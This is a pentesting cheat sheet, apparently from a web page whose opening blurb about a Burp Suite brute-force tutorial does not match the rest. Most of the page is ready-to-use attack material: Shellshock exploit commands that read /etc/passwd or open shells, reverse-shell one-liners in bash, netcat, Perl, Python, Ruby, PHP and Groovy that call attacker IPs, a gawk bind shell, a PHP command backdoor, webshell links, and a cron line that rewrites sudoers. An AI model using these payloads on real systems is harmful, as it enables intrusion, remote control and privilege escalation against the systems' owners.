Brute force attack with Burp Suite

 

This tutorial shows how to launch a brute-force attack with Burp Suite and explains how to use the Intruder module to automate the attack against a web application.

 


Pentest Killer Commands

Cheat Sheets

Vulnerability assessment

Scanning a web application with Nikto through a proxy (the option is -useproxy):

nikto -host 192.168.xx.xx -useproxy http://192.168.xx.xx:3129

 

Directory Buster with Proxy

dirb http://192.168.XX.XX -p 192.168.XX.XX:3129

WPScan With Proxy

wpscan --url 192.168.XX.XX/dir --proxy 192.168.XX.XX:3128

Curl Commands

Browsing the web page with proxy:

  1. curl 192.168.XX.XX/robots.txt -x 192.168.XX.XX:3128
  2. curl --proxy 192.168.37.129:3128 http://192.168.37.129:80/robots.txt

 

Browse in verbose mode:

curl -v 192.168.37.129 --proxy 192.168.37.129:3128

 

Shellshock exploitation with curl ($CMD is a placeholder for the command to run):

curl -H "User-Agent: () { :; }; echo; $CMD" --proxy http://192.168.37.129:3128 http://192.168.37.129/cgi-bin/status

 

Example:

curl -H "User-Agent: () { :; }; echo; /bin/uname -a" --proxy http://192.168.37.129:3128 http://192.168.37.129/cgi-bin/status
curl -x http://192.168.37.129:3128 -A "() { :; };/bin/sh -i >& /dev/tcp/192.168.32.41/443 0>&1" http://192.168.37.129/cgi-bin/status

 

Reverse Shell with Curl

curl 'http://192.168.XX.XX/cgi-bin/index.cgi' --user-agent ';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc XXX.XXX.XXX.XXX 80 >/tmp/f;exit' --data 'dest=%0ash</proc/self/environ'

Shellshock exploitation with wget:

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"
wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/bash -i > /dev/tcp/192.168.79.173/4444 0<&1" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"

Spawn Shell

Spawn Python TTY shell:

python -c 'import pty; pty.spawn("/bin/bash")'

 

Spawn interactive sh shell:

/bin/sh -i

 

Spawn Perl TTY shell (inside a Perl script, or as a one-liner):

exec "/bin/sh";

perl -e 'exec "/bin/sh";'

 

Spawn Ruby TTY shell:

exec "/bin/sh"

 

Spawn shell from the vi editor:

:!bash

 

Spawn TTY shell from Nmap (inside nmap --interactive, available in older versions):

!sh

 

Reverse Shells

Kali Webshell directory:

root@kali:/usr/share/webshells# ls -ltr
total 0
drwxr-xr-x 2 root root 183 Jan 20 2016 php
drwxr-xr-x 2 root root 63 Jan 20 2016 perl
drwxr-xr-x 2 root root 33 Jan 20 2016 cfm
drwxr-xr-x 2 root root 34 Jan 20 2016 aspx
drwxr-xr-x 2 root root 56 Jan 20 2016 asp
drwxr-xr-x 1 root root 40 Feb 8 09:44 jsp
root@kali:/usr/share/webshells#

 

Bash:

  1. bash -i > /dev/tcp/ATTACKERS_IP/port 0>&1
  2. exec /bin/bash 0&0 2>&0
  3. 0<&196;exec 196<>/dev/tcp/ATTACKERS_IP/80; sh <&196 >&196 2>&196
  4. exec 5<>/dev/tcp/ATTACKERS_IP/80; cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
  5. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.156.130 445 >/tmp/f

 

Example:

bash -c "bash -i >& /dev/tcp/192.168.171.2/31337 0>&1"
http://192.168.XX.XX:8080/?page=1&rcmd=bash -c "bash -i >& /dev/tcp/ATTACKERS_IP/31337 0>&1"

 

PHP:

php -r '$sock=fsockopen("ATTACKERS_IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
Note: the TCP socket uses file descriptor 3. Replace 3 with 4, 5, or 6 if it doesn't work.

 

Netcat:

  1. nc -e /bin/sh ATTACKERS_IP Port
  2. /bin/sh | nc ATTACKERS_IP Port
  3. rm -f /tmp/p; mknod /tmp/p p && nc ATTACKERS_IP 4444 0/tmp/p

 

Example:

nc -e /bin/sh 192.168.37.122 4444

 

Telnet:

  1. rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
  2. telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

 

Example:

telnet 192.168.37.130 80 | /bin/bash | telnet 192.168.37.130 443

 

Perl:

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 

Example:

perl -e 'use Socket;$i="192.168.1.XX";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 

Perl Windows:

  1. perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
  2. perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 

Ruby:

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

 

Java (written in Groovy syntax, as used in a Jenkins script console):

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

Example:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.50",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

Python reverse shell, URL-encoded:

python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.110.50%22%2C443))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27

 

Example:

http://192.168.XX.XX:port/?page=mailer&mail=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.1.14",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

Gawk (bind shell script, listens on port 8080):

#!/usr/bin/gawk -f
BEGIN {
    Port = 8080
    Prompt = "bkd> "
    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}

 


 

Building an exploit

Cross-compile a 32-bit binary on 64-bit Linux:

gcc -m32 exploit.c -o exploit

 

Cross-compile a 32-bit Windows .exe on Linux (MinGW):

i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

 

Shellshock (User-Agent payload):

() { ignored;};/bin/bash -i >& /dev/tcp/192.168.221.139/443 0>&1

 

Backdoors

PHP:

<?php system($_REQUEST['cmd']); ?>

Shells

DAws.php:

https://github.com/dotcppfile/DAws/blob/master/DAws.php

 

c99:

https://github.com/tennc/webshell/blob/master/php/PHPshell/c99shell/c99shell.php

 

b374k shell 3.2

https://github.com/b374k/b374k

 

Privilege escalation

Cron job update

echo 'chmod 777 /etc/sudoers && echo "<user name (LOW priv)> ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /dir/<cronfile to run>

 

Reference sites for enumeration

http://www.speedguide.net/port.php?port=8080
https://www.youtube.com/user/myexploit2600
https://myexploit.wordpress.com/port-number-exploits/
https://docs.google.com/uc?export=download&confirm=wKvF&id=0Bx3odaY_Hs9oaGZuTGJnMG9lUUU
https://myexploit.wordpress.com/control-metasploit-post-exploits/
http://www.bekkoame.ne.jp/~s_ita/port/port1-99.html
http://www.speedguide.net/ports_sg.php
https://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applications-for-learning/

http://www.vulnerabilityassessment.co.uk/nfs.htm

https://ma.ttias.be/remote-code-execution-via-http-request-in-iis-on-windows/

https://www.pentestpartners.com/blog/using-nfsshell-to-compromise-older-environments/

 

Reference Links for LFI:

https://highon.coffee/blog/lfi-cheat-sheet/

 

iptables rules:

https://www.suse.com/communities/blog/basic-iptables-tutorial/

 

 
